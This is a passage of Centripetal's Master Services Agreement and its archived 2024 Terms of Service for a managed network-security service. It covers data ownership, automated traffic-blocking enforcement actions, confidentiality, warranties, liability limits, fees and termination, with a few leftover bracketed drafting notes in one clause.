procedures, campaigns, and related artifacts, that Centripetal develops, curates, collects, or licenses independently of Customer Data, including data from Centripetal’s own research and from third-party or open-source intelligence sources.w. “Derived Threat Intelligence” means analytics, insights, indicators, and related artifacts that Centripetal derives from Customer Data, Usage Data, or telemetry, in each case to the extent they relate to malicious or potentially malicious cyber activity or threat actors. Neither Centripetal Threat Intelligence nor Derived Threat Intelligence includes Personal Information or information that identifies the Customer or Authorized Users.x. “Usage Data” means data generated by the Products or by Centripetal in connection with Customer’s use of the Products, including product and service logs, performance metrics, configuration information, and related technical data. Usage Data does not include data or logs that Customer submits or transmits to the Products, including logs from Customer’s own or third-party systems, which are Customer Data. Usage Data will not include Personal Information.3. SCOPE AND PRECEDENCECentripetal will provide the Products and Services as set forth in the applicable Order Form upon execution of such Order Form. This MSA governs all Products and Services purchased, leased, or subscribed by Customer as further described in the applicable Order Form. In addition to the foregoing:a. the SaaS Exhibit (Exhibit A) applies to the SaaS Services, which can be found here;b. the Hardware Terms (Exhibit B) applies to the Hardware, which can be found here.In the event of conflict between the Agreements, the order of precedence shall be: (1) the DPA; (2) the applicable SaaS Exhibit or Hardware Exhibit, with respect to the Products or Services it governs; (3) this MSA; and (4) the applicable Order Form. A term in an Order Form will prevail over this MSA or an Exhibit only where the Order Form expressly identifies, by section number and heading, the provision it modifies and states the Parties’ intent to override it, and then only with respect to the Products and Services ordered under that Order Form. Any additional, pre-printed, handwritten, or free-text terms appearing on any quotation, Order Form, purchase order, or other procurement document, whether submitted by Customer, a reseller, or otherwise, are rejected and have no force or effect unless set out in a writing signed by an authorized signatory of Centripetal that expressly identifies the provision being modified.4. COMPLIANCE WITH LAWEach Party agrees to comply with all applicable federal, state, and local laws, ordinances and regulations. If at any time during the Term, a Party is informed or information comes to its attention that it is or may be in violation of any law, ordinance, code, or regulation (or if it is so determined by any court, tribunal or other authority), that Party shall immediately take all appropriate steps to remedy such violation and comply with such law, ordinance, code, or regulation in all respects, at the Party’s sole cost and expense.5. CENTRIPETAL OWNERSHIPAs between the Parties, Centripetal and its licensors own all right, title, and interest in and to the intellectual property rights related to the Products and the Services, including any improvements, modifications, or enhancements thereto. Centripetal further retains all right, title, and interest in and to: (i) Centripetal Confidential Information; (ii) Threat Intelligence Data; (iii) Usage Data; (iv) Deidentified data derived from Customer Data; and (v) all methodologies, processes, know-how, templates, rulesets, analytics models, and other intellectual property embodied in or used to produce any Deliverables or Threat Intelligence Data. Except for the limited rights expressly granted in the Agreements, no licenses or other rights in or to the Products are granted to Customer, whether by implication, estoppel, or otherwise, and all such licenses and rights are expressly reserved by Centripetal and its licensors.6. CUSTOMER OWNERSHIPAs between the Parties, Customer retains all right, title, and interest in and to Customer Data and Deliverables, subject to the rights reserved by Centripetal in Section 5 (Centripetal Ownership). Customer grants Centripetal a non-exclusive, worldwide, royalty-free license, during the Term, to access, process, store, use, aggregate, and Deidentify Customer Data, including through its Sub-Processors, for the purpose of providing, operating, improving, and securing the Products and Services and generating Derived Threat Intelligence and Deliverables. For clarity, Customer’s ownership of Deliverables is limited to the tangible outputs provided to Customer (such as reports, dashboards, or alerts) for Customer’s internal business purposes. Centripetal retains and reserves all right, title, and interest in and to the methodologies, processes, know-how, templates, rulesets, analytics models, and other intellectual property embodied in or used to create Deliverables. Centripetal may also freely use Deliverables, in whole or in part, in Deidentified or aggregated form, for its business purposes, including without limitation to improve its Products and Services, enhance threat intelligence, and generate new deliverables for other customers, provided that such use does not disclose Customer’s or any Authorized User’s identity or Customer Confidential Information.7. CUSTOMER RESPONSIBILITIESCustomer is responsible for all activity of Authorized Users and for Authorized Users’ compliance with the applicable Agreements. Without limiting the foregoing, Customer shall: (i) have sole responsibility for the accuracy, quality, integrity, legality, reliability and appropriateness of all Customer Data provided to or accessed by Centripetal through the Products and Services; (ii) obtain and maintain all necessary rights and consents required for Centripetal’s access to, use of, and processing of Customer Data as contemplated by the applicable Agreements; (iii) notify Centripetal promptly of any unauthorized access or use of the Products; (iv) provide Centripetal with reasonable cooperation, access, and complete and accurate information as needed for delivery of the Products and Services, including information Centripetal relies on to configure and tune the Products and Services, and promptly update that information when it changes; (v) maintain and prepare its facilities, networks, and systems for proper operation of the Products and Services; (vi) safeguard all access credentials, configuration settings, and any software components of the Products installed on Customer systems; (vii) not use the Products for unlawful or prohibited purposes; (viii) be solely responsible for investigation and remediation of security incidents within its own systems, unless otherwise agreed between the Parties; and (ix) where Centripetal accesses or retrieves data from a third party at Customer’s direction or on Customer’s behalf, identify those sources to Centripetal, disclose any applicable third-party terms or restrictions, and obtain and maintain all rights and consents necessary for that access, and such data is Customer Data for which Customer is responsible under the applicable Agreements. Centripetal shall not be Liable for any delay or failure in the performance or provisioning of the Products or Services to the extent caused by Customer’s failure to meet the foregoing responsibilities. Centripetal will retrieve, decrypt, or perform packet-capture analysis of Customer’s traffic only as authorized by Customer.8. ENFORCEMENT ACTIONSCustomer acknowledges that the Products and Services make and enforce policy decisions that may block, filter, redirect, quarantine, isolate, or otherwise act on network traffic, connections, DNS resolution, or endpoints, and that these Enforcement Actions may be automated or directed by Centripetal personnel. Customer authorizes Centripetal to take Enforcement Actions in providing the Products and Services. Any Enforcement Action, whether correct or taken on a false positive, may affect or interrupt legitimate traffic, systems, data, or operations. Customer is responsible for identifying, clarifying, and communicating to Centripetal the allow-lists, exceptions, and exclusions it requires, including any systems that must be excluded from [[particular]] Enforcement Actions, and Customer accepts the risk of Enforcement Actions except to the extent [caused by Centripetal’s gross negligence or willful misconduct] [[critical internal and external systems… ‘always have to reach server abroad’]].9. CONFIDENTIALITYa. Obligations. Except as permitted under the applicable Agreements, the Receiving Party shall not disclose or provide access to any third party to any Disclosing Party’s Confidential Information without express written authorization from the Disclosing Party. Either party may disclose Confidential Information on a need-to-know basis to (i) its personnel, auditors and Affiliates who are subject to the same confidentiality obligations, and (ii) its attorneys and accountants who are either subject to professional obligations of confidentiality or have agreed to be bound by confidentiality obligations at least as protective as those set out herein. The Receiving Party will use at least the same level of care to prevent unauthorized use of the Disclosing Party’s Confidential Information as it uses for its own Confidential Information, but in no event less than a reasonable standard of care. The confidentiality obligations in this Section apply during the Term and for five (5) years after termination or expiration, except that Confidential Information that constitutes a trade secret remains protected for as long as it remains a trade secret under applicable law. Upon the Disclosing Party’s written request or upon termination or expiration, the Receiving Party will return or destroy the Disclosing Party’s Confidential Information in its possession, except for copies retained in routine backups or as required by law, which remain subject to this Section. Centripetal Threat Intelligence is the Confidential Information of Centripetal, whether or not marked or designated as confidential.b. Compelled Disclosures. If the Receiving Party receives a subpoena or other request to disclose any Disclosing Party’s Confidential Information, the Receiving Party will (to the extent permitted by law) do the following: (i) promptly notify the Disclosing Party; (ii) provide the Disclosing Party with a copy of the subpoena or request unless the law prohibits the Receiving Party from doing so; (iii) where possible, and to the extent permitted by law, direct the requesting authorities to request the information directly from the Disclosing Party; and (iv) not disclose any such Confidential Information unless and until (a) the Disclosing Party authorizes such disclosure in writing, or (b) a judicial, legislative, executive, or administrative body orders the Receiving Party to disclose such Confidential Information, the time for the Disclosing Party to appeal or challenge the order has expired, and the Disclosing Party has not appealed or challenged the order within that time.10. DATA PROCESSING AGREEMENTIf and to the extent Customer Data includes Personal Information subject to Data Protection Laws (as that term is defined in the DPA), the DPA will apply to the Products and Services that Centripetal provides to Customer, in which case the DPA is incorporated herein.11. SUB-PROCESSORSIn the course of providing Products and Services, Centripetal may engage Sub-Processors. Centripetal shall use contractual or other means to obligate such Sub-Processors to comply with data-protection and confidentiality obligations at least as protective as those in the Agreements.12. TERMThis MSA begins on the Effective Date and continues until terminated as provided in this MSA or the applicable Order Form (the “Term”). “Effective Date” means the subscription or service start date specified in the applicable Order Form. Unless otherwise stated in the applicable Order Form, such Order Form will automatically renew for successive terms equal in length to the initial term, unless either Party provides written notice of non-renewal at least sixty (60) days prior to the end of the then-current term.13. TERMINATIONIn the event that either Party materially breaches any of the applicable Agreements, or any applicable law relevant to the Agreements or to that Party’s performance under the Agreements, and is unable or fails to cure such breach within thirty (30) days of written notice of such breach from the other Party, or if either Party becomes insolvent or bankrupt, or a receiver, assignee, or other liquidating officer is appointed for such Party for its business or assets, then the other Party may terminate the MSA and the applicable Order Form immediately, and without incurring any Liability. In addition to the foregoing, Centripetal may terminate this MSA and the Order Form for convenience with 60 days’ written notice at any time. If Centripetal terminates this MSA or an Order Form for convenience, Centripetal will refund to Customer a pro-rata portion of any prepaid Fees for the terminated Products or Services covering the period after the effective date of termination.14. EFFECT OF TERMINATIONUpon expiration or termination of this MSA, all rights granted to Customer will immediately cease, and Customer shall immediately discontinue all use of the Products. Customer shall provide Centripetal with reasonable access to Customer’s facilities, during normal business hours, to allow Centripetal or its designated agents to retrieve and de-install any Hardware provided under the applicable Order Form. Centripetal will bear the reasonable costs of such retrieval and de-installation, unless otherwise specified in the applicable Order Form. If Customer fails to provide access for retrieval within thirty (30) days following termination or expiration, Centripetal may invoice Customer for the then-current list price of the unreturned Hardware. The following Sections survive termination or expiration: Centripetal Ownership, Customer Ownership, Confidentiality, Indemnification, Limitation of Liability, Feedback, and Governing Law, together with any accrued payment obligations and any other provision that by its nature should survive.15. FEESCustomer shall pay Centripetal all undisputed Fees specified in the applicable Order Form within thirty (30) days of receipt of invoice, unless different payment terms are stated therein. If Customer fails to pay the undisputed Fees when due, in addition to all other remedies available to Centripetal, (i) Customer shall pay interest on all overdue and unpaid amounts at the rate of 1.5% per month calculated daily and compounded monthly or, if lower, the highest rate permitted under applicable law, (ii) Customer shall be liable to Centripetal for all Liability arising out of or related to Centripetal’s collection of overdue or unpaid Fees; (iii) Centripetal may in its sole discretion suspend or terminate the applicable Agreements and provision of Products and Services without any Liability; and (iv) Centripetal may retain Deliverables until such default is cured. Except as expressly provided in this MSA, all Fees are non-cancellable and non-refundable, and are exclusive of taxes and similar assessments, which are Customer’s sole responsibility. Customer is responsible for all sales, use, and excise taxes, and any other similar taxes, duties, and charges of any kind imposed by any governmental or regulatory authority on any amounts payable by Customer under the applicable Order Form, other than any taxes imposed on Centripetal’s own income.16. WARRANTIESa. Mutual Warranties. Each Party warrants it has full power to enter into this MSA.b. Customer Warranties. Customer represents and warrants that all Customer Data and other information and materials that Customer provides or makes available to Centripetal under any applicable Order Form: (i) is owned by Customer, or Customer is authorized to provide it to Centripetal for the purposes set forth in the applicable Agreements; (ii) does not infringe or misappropriate any trademark, service mark, copyright, or any third-party rights, including intellectual property rights; (iii) does not contain any libelous material or otherwise violate the rights or causes damage or injury to any person; (iv) complies with Data Protection Laws and any other applicable law; and (v) is not a violation of any contractual, statutory, common law, or other legal obligation or duty. Customer further represents and warrants that it has provided all notices and obtained all consents and legal bases required for Centripetal to access, intercept, inspect, decrypt, and process the network traffic, communications, and data of Authorized Users and other persons using Customer’s networks, systems, or devices in connection with the Products and Services, in each case as directed or authorized by Customer.c. Centripetal Warranties. Centripetal warrants that: (i) the Services will be provided in a professional, workmanlike manner consistent with generally accepted industry standards; and (ii) any Hardware provided will be free from material defects in materials and workmanship for a duration of one-year or the warranty period set forth in the applicable Order Form. Centripetal makes no warranties with respect to any Third-Party Technology, which is provided subject only to the applicable third-party terms. Customer’s exclusive remedy for breach of these warranties is, at Centripetal’s option, re-performance of the non-conforming Services, repair or replacement of the non-conforming Hardware, or, if not cured within thirty (30) days after written notice, a pro-rata refund of prepaid Fees for the affected period. The foregoing warranties do not apply to issues caused by misuse, alteration, or combination with unauthorized systems.d. Disclaimer. Except as expressly provided in the applicable Agreements, the Products, Services, Hardware, and Deliverables are provided “as is” and “as available.” Centripetal disclaims all warranties, express or implied, including any warranties of merchantability, fitness for a particular purpose, and non-infringement. Centripetal does not warrant that all threats will be detected or prevented, that the Products or Services will be free from false positives or false negatives, that any data, reports, or analytics will be accurate or achieve any particular result, or that the Products will be error-free, uninterrupted, or compatible with third-party software or services. Customer shall not rely on the Products or Services as its sole means of detecting or preventing security threats, remains responsible for maintaining its own security controls and for the backup and protection of its data, and will not hold Centripetal responsible for threats not detected or prevented. To the extent permitted by applicable law, these disclaimers apply in full force. Nothing in this Section shall limit any warranties that cannot be excluded or disclaimed under applicable law.17. SUPPORT SERVICESCentripetal will provide support services for the Products and Services in a professional and workmanlike manner consistent with industry standards for similar services, but does not warrant that every question, issue, or problem will be resolved. Centripetal’s support may not extend to issues arising from: (i) use of the Products other than in accordance with the guidelines provided by Centripetal; (ii) modifications, alterations, or configurations of the Products not performed or authorized by Centripetal; (iii) failures or issues of Customer’s equipment, networks, or third-party software or services not supplied by Centripetal; (iv) any Third-Party Technology, except as expressly set forth in the SaaS Exhibit; or (v) factors outside Centripetal’s reasonable control. Where practicable, Centripetal will use commercially reasonable efforts to assist Customer in diagnosing such excluded issues, and Centripetal may offer remediation subject to additional fees as agreed in writing.18. INDEMNIFICATIONa. Customer Indemnification. Customer will defend Centripetal against any third-party claim arising out of or relating to: (i) Customer Data or other information or materials Customer provides or makes available to Centripetal, including any claim that they infringe or misappropriate a third party’s rights or violate applicable law; (ii) Customer’s or an Authorized User’s violation of applicable law or of the applicable Agreements; or (iii) Centripetal’s access to, interception, inspection, decryption, or Processing of network traffic, communications, or data of Authorized Users or other persons, as directed or authorized by Customer. Customer will indemnify Centripetal for damages, costs, and reasonable attorneys’ fees finally awarded against Centripetal, or agreed in settlement, in connection with such claim. To the extent any claim or Liability arises out of or relates to a Breach of Personal Information or the Processing of Personal Information, it is governed by and allocated under the DPA rather than this Section.b. Centripetal Indemnification. Centripetal will defend Customer against any third-party claim brought in the United States alleging that Customer’s authorized use of the Products infringes or misappropriates such third party’s United States patent, copyright, trademark, or trade secret, and will indemnify Customer for damages and reasonable attorneys’ fees finally awarded against Customer, or agreed in settlement by Centripetal. Centripetal has no obligation under this Section for any claim to the extent arising from: (a) use of a Product not in accordance with the applicable Agreements; (b) modification of a Product by anyone other than Centripetal; (c) combination, operation, or use of a Product with hardware, software, data, or materials not supplied by Centripetal, if the Product would not be infringing absent the combination; or (d) Customer’s continued use of a Product after Centripetal has made available a non-infringing version or modification and notified Customer. Centripetal’s obligations under this Section do not extend to any Product that consists of Third-Party Technology, which is licensed subject to the applicable third-party terms. If a Product is, or in Centripetal’s opinion is likely to become, the subject of an infringement claim, Centripetal may, at its option and expense: (i) procure for Customer the right to continue using the Product; (ii) modify or replace it so that it is non-infringing while remaining substantially equivalent in functionality; or (iii) if neither (i) nor (ii) is commercially reasonable, terminate the affected Product or Service and refund a pro-rata portion of prepaid Fees for the terminated portion. This states Centripetal’s entire liability and Customer’s exclusive remedy for intellectual-property infringement.c. Indemnification Procedure. The party seeking indemnification will promptly notify the other of the claim (delay excuses the indemnifying party only to the extent it is prejudiced), give the indemnifying party sole control of the defense and settlement, and provide reasonable cooperation at the indemnifying party’s expense. The indemnifying party will not settle any claim in a way that imposes liability or an admission on, or requires any payment or action by, the indemnified party without its prior written consent, not to be unreasonably withheld. The indemnified party may participate with its own counsel at its own expense.19. LIMITATION OF LIABILITYa. Enforcement Actions. To the maximum extent permitted by applicable law, Centripetal will have no Liability arising out of or relating to any Enforcement Action, including any interruption of or damage to legitimate traffic, systems, data, or operations, except to the extent caused by Centripetal’s grossly negligent, reckless, or intentional acts or omissions. Nothing in this Section limits Centripetal’s obligations under the DPA.b. Exclusion of Damages. Except for a Party’s indemnification obligations under Section 18 (Indemnification), and to the maximum extent permitted by applicable law, neither Party will be liable for any indirect, incidental, special, consequential, exemplary, or punitive damages, or for any lost profits, lost revenue, or lost or corrupted data, arising out of or relating to the Agreements, regardless of the theory of liability and even if advised of the possibility.c. Cap. Except for (i) payment obligations; (ii) breach of warranties under Section 16 (Warranties); (iii) Liability under the DPA; (iv) Customer’s Liability for breach of Section 2 (Use Restrictions), Section 4(i), and Section 4(vii) of the SaaS Exhibit, except to the extent such Liability is governed by the DPA; and (v) a Party’s indemnification obligations under Section 18 (Indemnification), each Party’s aggregate Liability is limited to the Fees paid or payable by Customer for the affected Products or Services during the twelve (12) months preceding the event giving rise to Liability.20. FEEDBACKWithout limiting Centripetal’s confidentiality obligations under this MSA, Centripetal may freely use, exploit, and act upon any suggestions, ideas, enhancement requests, recommendations, or other feedback provided by Customer relating to the Products or Services (“Feedback”), without restriction and without obligation to Customer. All Feedback is provided by Customer on an “as-is” basis without warranty of any kind. For clarity, Feedback does not constitute Customer Confidential Information, and Customer grants Centripetal a perpetual, irrevocable, worldwide, royalty-free license to use and incorporate such Feedback into its products and services.21. FORCE MAJEURECentripetal shall have no Liability to Customer, and shall not be in violation of the applicable Agreements, for any failure or delay in performing its obligations if and to the extent any such failure or delay is caused by any circumstance beyond Centripetal’s reasonable control, including acts of God, flood, fire, earthquake, explosion, war, terrorism, invasion, riot or other civil unrest, strikes, pandemic or public health crisis, labor stoppages or slowdowns or other industrial disturbances, or passage of law or any action taken by a governmental or public authority, including imposing an embargo. Upon the occurrence of a Force Majeure event, Centripetal shall timely notify Customer of the force majeure event, the period of time the occurrence is expected to continue, and its efforts to mitigate the cause and circumstances of such delay or failure with respect to the Products or Services affected thereby. Centripetal shall resume the performance of its obligations as soon as reasonably practicable after the removal of the cause.22. RESELLERSCustomer may purchase Products or Services through a Centripetal-authorized reseller. A reseller is not Centripetal’s agent and has no authority to make any representation, warranty, commitment, or modification on Centripetal’s behalf. Any order placed through a reseller is governed exclusively by the Agreements, and any term agreed between Customer and a reseller that differs from or conflicts with the Agreements does not bind Centripetal and is void as against Centripetal. Customer’s acceptance of the Agreements under Section 1 (Structure) applies regardless of any reseller arrangement. Payment of applicable Fees to an authorized reseller discharges Customer’s payment obligation to the extent so paid.23. NO AGENCYCentripetal shall perform the Services as an independent contractor and nothing contained herein shall be deemed to create any association, partnership, joint venture or relationship of principal and agent, employer and employee, or master and servant, between the Parties, or to provide either Party with the right, power or authority, whether expressed or implied, to create any such duty or obligation on behalf of the other Party.24. WAIVERFailure to object or to take affirmative action with respect to any conduct by the other Party which is in violation of the applicable Agreements shall not be construed as a waiver of any future breach or subsequent wrongful conduct. Any waiver of the provisions of the applicable Agreements or of a Party’s rights or remedies under the applicable Agreements must be in writing to be effective.25. NOTICENotices required hereunder shall be sent to physical and electronic addresses customarily used by the Parties to communicate with one another.26. GOVERNING LAWThe Agreements shall be governed by the laws of the Commonwealth of Virginia, both as to interpretation and performance, regardless of the choice of law rules of that Commonwealth or any other jurisdiction. The Parties shall be subject to personal jurisdiction in the Commonwealth of Virginia, and the exclusive jurisdiction and venue for any action arising out of or related to the Agreement shall be the state and federal courts located in the Commonwealth of Virginia, except as may be necessary to enforce an order of such court.27. NO PUBLICITYNeither Party shall issue or release any announcement, statement, press release, or other publicity or marketing materials relating to the Agreement, or otherwise use the other Party’s trademarks, service marks, trade names, logos, symbols, or brand names, in each case, without the prior written consent of the other Party.28. SEVERABILITYEach term, condition, and provision of the applicable Agreements shall be valid and enforced to the fullest extent permitted by law. If there is any conflict between any term, condition, or provision of the applicable Agreements and any statute, law, ordinance, order, rule, or regulation, the latter shall prevail; provided, that any such conflicting term, condition, or provision shall be curtailed and limited only to the extent necessary to bring it within the legal requirements and the remainder of the Agreements shall not be affected thereby. If any term, condition, or provision of the applicable Agreements is held to be invalid, illegal, or unenforceable by a court or other tribunal of competent jurisdiction, that provision will be modified to the minimum extent necessary to make it valid and enforceable, or if it cannot be so modified, severed, and the remaining provisions will continue in full force and effect.29. SUCCESSORS AND ASSIGNSThe applicable Agreements are binding upon and will inure to the benefit of the Parties and their respective permitted successors and assigns. Neither Party may assign or transfer the applicable Agreements, in whole or in part, without the prior written consent of the other Party, except that Centripetal may assign the Agreements without consent in connection with a merger, acquisition, corporate reorganization, or sale of all or substantially all of its assets. Any attempted assignment in violation of this section will be null and void.30. MODIFICATIONSCentripetal may update the Agreements from time to time, and the current version will be posted at https://centripetal.ai/data-processing-agreement. Updates that do not materially change Customer’s rights or obligations (for example, updates to Documentation, operational details, or contact information) are effective on posting. Any update that materially changes Customer’s rights or obligations takes effect, at Centripetal’s election, either (a) upon renewal of the applicable Order Form, with Customer’s renewal constituting acceptance of the then-current version posted at the URL above, or (b) upon Centripetal providing notice of the update and Customer’s acceptance of it. A material update under clause (a) applies at renewal only if posted before the non-renewal notice window for that term opens under Section 12 (Term); otherwise it applies at the following renewal. A Customer that does not wish to accept a material update under clause (a) may decline to renew under Section 12 (Term). No amendment is effective unless made in accordance with this section or set out in a writing signed by an authorized signatory of Centripetal. Terms of Service ArchiveMay 9, 2024: https://www.centripetal.ai/terms-of-service/050924 --- ### [Terms of Service - Archive](https://www.centripetal.ai/terms-of-service/050924) Published: 2025-08-12 Terms of ServiceLast Updated: May 9th 2024This Agreement “Agreement” is made as of the date last signed below (the “Effective Date”) by and between CENTRIPETAL NETWORKS, INC., a Delaware Limited Liability Company “Centripetal” and, “Client” (each of Centripetal and Client, a “Party” and, collectively, the “Parties”).BackgroundCentripetal Networks has developed the Centripetal Networks RuleGATE® device, a TCP/IP packet filter which is used to apply threat intelligence in a network and to protect networks from cyber threats by malicious users trying to disrupt network operation, cyber criminals attempting to steal intellectual property, and hostile governments preparing to do both (the “Product”). Centripetal offers this capability as a fully managed service branded: CleanINTERNET®Client desires to obtain ongoing threat monitoring and mitigation as a professional service, and Centripetal Networks is willing to enter into such a relationship with Client subject to the terms and conditions set forth in this Agreement. AgreementIn consideration of the mutual covenants recited below, and for other good and valuable consideration, the receipt and sufficiency of which are hereby acknowledged, the Parties agree as follows:1.0 SERVICE USE1.1 Provision of Product. Centripetal agrees to provide Client the Product and Professional Services during the Service Period (as defined in Section 6.1). Client agrees to use the Product solely for purposes of the CleanINTERNET Service during such Service Period and, solely for Client’s own internal use. Client acknowledges that Centripetal retains ownership of the Product.1.2 Embedded Software License. The Product may contain certain embedded software (“Embedded Software”). In the event that the Product contains Embedded Software, such Embedded Software is licensed, not sold, and Client’s use of the Embedded Software is granted only subject to Client’s strict compliance with this Agreement. Centripetal grants Client a nonexclusive, nontransferable, paid-up license to use the Embedded Software solely in connection with the use of the accompanying Product, solely as embedded in the Product, and solely in accordance with any applicable user documentation provided with such Embedded Software and/or Product. Such license shall expire at the conclusion of the Service Period. Client shall not adapt, alter, modify, decompile, disassemble, reverse engineer, translate, or create derivative works of the Embedded Software or any component of the Embedded Software. Certain items of software included with the Embedded Software are subject to “open source” or “free software” licenses (“Open Source Software”). Some of the Open Source Software is owned by third parties. The Open Source Software is not subject to the terms and conditions of this section. Instead, each item of Open Source Software is licensed under the terms of the end- user license that accompanies such Open Source Software. Nothing in this Agreement limits your rights under, or grants you rights that supersede, the terms and conditions of any applicable end user license for the Open Source Software. In particular, nothing in this Agreement restricts your right to copy, modify, and distribute that Open Source Software subject to the terms of the applicable end user license.1.3Service Scope. The Parties agree to the Service tier and associated Service Scope (see ” SERVICE SCOPE” and “CleanINTERNET Service Levels”). Client agrees to perform or provide the items contained in the Service Scope requirements during the Service Period and to provide Centripetal with any clarifications or procedural guidelines that are needed for its own performance of the Service1.4 Centripetal Intellectual Property Rights. As between Client and Centripetal, Centripetal owns all right, title and interest in and to the intellectual property rights related to the Services, the Product, and the Embedded Software, including any improvements, modifications or enhancements thereto. Other than as expressly set forth in this Agreement, no license or other rights in or to the Product or the Embedded Software are granted to Client, and all such licenses and rights are hereby expressly reserved.2.0 CLIENT OBLIGATIONS2.1 Product Care; Liens. During the Service Period, Client shall handle the Product with reasonable care, and shall exercise reasonable efforts to avoid damage thereto. Client shall be responsible for any damages or losses to the Product until such time as it has been returned to Centripetal. Client shall not open, disassemble, or attempt to reverse engineer the product. Client shall not directly or indirectly create, incur, assume or suffer to exist any mortgage, pledge, lien, charge, security interest, encumbrance or claim on or with respect to Product or any interest therein, except for the lien and security interest of Centripetal therein created under this Agreement. Client shall promptly, at its own expense, take such action as may be necessary to duly discharge any such mortgage, pledge, lien, security interest, charge, encumbrance or claim if the same shall arise at any time.3.0 DELIVERY, INSTALLATION, ACCESS AND TECHNICAL SUPPORT OBLIGATIONS3.1 Delivery and Installation. Centripetal will deliver and upon request from Client install the Product at a Client designated location at a mutually agreeable time.3.2 Centripetal Access for Evaluation; Feedback. Throughout the Threat Monitoring Period, Client shall provide Centripetal with reasonable access to Client’s facilities to inspect or repair the Product. Centripetal shall exercise reasonable efforts to provide Client at least three (3) business days’ notice prior to such inspecti Client agrees to provide Centripetal Feedback through surveys, feedback sessions, and as otherwise reasonably requested by Centripetal. “Feedback” means information, comments, suggestions, and other feedback regarding the use, operation, functionality, and characteristics of the Product and Embedded Software. Client hereby unconditionally and irrevocably assigns to Centripetal all right, title and interest in and to the Feedback, and all intellectual property rights therein.3.3 During the Service Period, Centripetal will (i) provide reasonable replacement parts at no cost and (ii) provide training during implementation. During the Service Period, Centripetal will make available reasonable telephone and email support for the Product during its normal business hours of 8:00 AM to 5:00 PM ET. Unless otherwise agreed by the Parties, Centripetal shall have no obligation to provide support with respect to any error or problem resulting from (a) use of the Product other than strictly according to the terms of this Agreement; (b) modification of the Product by Client or any third party; or (c) any combination or integration of the Product with hardware, software and/or technology not provided or approved by Centripetal for use with the Product.4.0 DISCLAIMERS AND EXCLUSION OF LIABILITIES4.1 General Disclaimer. CLIENT AGREES THAT IT IS ENTERING THIS AGREEMENT SOLELY FOR PURPOSES OF THE PRODUCT AND SERVICES. ACCORDINGLY, CLIENT AGREES TO ASSUME ALL RISKS FROM USE OF THE PRODUCT AND SERVICES AND ACKNOWLEDGES THAT THE PRODUCT AND ANY OTHER MATERIALS OR SERVICES PROVIDED BY CENTRIPETAL ARE PROVIDED “AS IS” AND “WITH ALL DEFECTS.” TO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE LAW, CENTRIPETAL DISCLAIMS ANY AND ALL PROMISES, REPRESENTATIONS AND WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, INCLUDING, BUT NOT LIMITED TO, ANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, DATA ACCURACY, TITLE, NON-INFRINGEMENT, NON-INTERFERENCE AND/OR QUIET ENJOYMENT. CENTRIPETAL DOES NOT WARRANT THAT THE PRODUCT WILL MEET CLIENT’S REQUIREMENTS OR THAT THE OPERATION OF THE PRODUCT WILL BE UNINTERRUPTED OR ERROR-FREE, OR THAT ALL OR ANY ERRORS WILL BE CORRECTED. CENTRIPETAL WILL NOT BE RESPONSIBLE FOR ANY LOSSOR DAMAGE TO ANY DATA. Some jurisdictions do not allow the limitation or exclusion of liability for certain damages, including incidental or consequential damages. In such jurisdictions, the limitations set forth in Section 4.1, 4.2, and 4.3 may not apply to Client insofar as they concern such damages.4.2 Limited Remedies. CENTRIPETAL SHALL NOT BE LIABLE FOR LOST PROFITS OR LOSS OF DATA OR INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, OR PUNITIVE DAMAGES ARISING OUT OF OR IN CONNECTION WITH THE PRODUCT, EMBEDDED SOFTWARE OR THIS AGREEMENT WHICH MAY BE INCURRED BY CLIENT.4.3 Limitation of Liability. THE CUMULATIVE LIABILITY OF CENTRIPETAL TO CLIENT FOR ALL CLAIMS ARISING FROM OR RELATING TO THIS AGREEMENT, INCLUDING, WITHOUT LIMITATION, ANY CAUSE OF ACTION SOUNDING IN CONTRACT, TORT, OR STRICT LIABILITY, SHALL NOT EXCEED THE FEES PAID OR PAYABLE BY CLIENT FOR THE SERVICE DURING THE SERVICE PERIOD.4.4 Essential Basis. CLIENT ACKNOWLEDGES THAT THE EXCLUSIONS, LIMITATIONS OF LIABILITY AND DISCLAIMERS OF WARRANTY SET FORTH IN THIS AGREEMENT FORM AN ESSENTIAL BASIS OF THE BARGAIN BETWEEN THE PARTIES.5.0 FEES AND PAYMENTS5.1 The fees due under this Agreement with respect to the Service are specified in the attached Proposal (see “CLEANINTERNET SERVICE PROPOSAL”). Payments will be made on net 30 payment terms unless otherwise specified in the Proposal. Annual contract value due on execution and on terms specified in Proposal.6.0 TERM AND TERMINATION6.1 The “Service Period” shall commence on the date of receipt by Client of the Product(s) (the “Commencement Date”) and shall continue until the date which is specified in the Service Scope (CLEANINTERNET SERVICE SCOPE), or such other mutually agreed upon period. This Agreement shall remain in effect until the end of the Service Period, unless either Party terminates this Agreement sooner in accordance with the following provisions of Section 6. The Service Period shall renew unless notice of non-renewal is received at least 60 days prior to expiration of the term.6.2 Termination by Client. Client may terminate this Agreement at any time prior to shipment of the Product to Client and during the first thirty days of the Service Period by providing Centripetal five (5) days prior written notice.6.3 Termination by Centripetal. At any time Centripetal shall have the right to terminate this Agreement immediately and without further obligation or liability hereunder if Client breaches any material term of this Agreement after notice by Centripetal of such breach. During the Service Period, Centripetal shall be entitled to terminate this Agreement without cause upon sixty (60) days prior written notice to Client. In the event that Centripetal terminates this Agreement without cause, Centripetal shall refund Client the prepaid fees received by Centripetal proportionate to the remainder of the Service Period after the effective date of termination.6.4 Rights and Obligations Upon Termination. Upon the expiration or termination of this Agreement, all rights granted hereunder to Client shall cease, and Client shall immediately (a) notify Centripetal and Centripetal will retrieve and de-install the Product at Centripetal’s expense; and (b) provide reasonable access to Client’s facilities and such assistance as Centripetal may request to allow Centripetal or its designated agents or contractors to remove the Product. If Client fails to permit Centripetal to retrieve and de-install the Product within fifteen (15) days upon termination or expiration of this Agreement, Client shall pay the then-current price of the Product pursuant to an invoice provided by Centripetal and, until such time that payment for the aforementioned invoice is received in full, Client hereby grants Centripetal a first priority security interest in the unreturned Product to the maximum extent provided by law. Termination of this Agreement and/or invoicing for the Product by Centripetal shall be without prejudice to any other remedies that Centripetal may lawfully have, whether at law or in equity.6.5 The provisions of Sections 1.5, 4, 6.4, 6.5 and 7 shall survive the termination or expiration of this Agreement.7.0 GENERAL7.1 Reservation of Rights. Centripetal reserves all rights not expressly granted in this Agreement. Unless otherwise expressly stated, all remedies stated in this Agreement are cumulative, 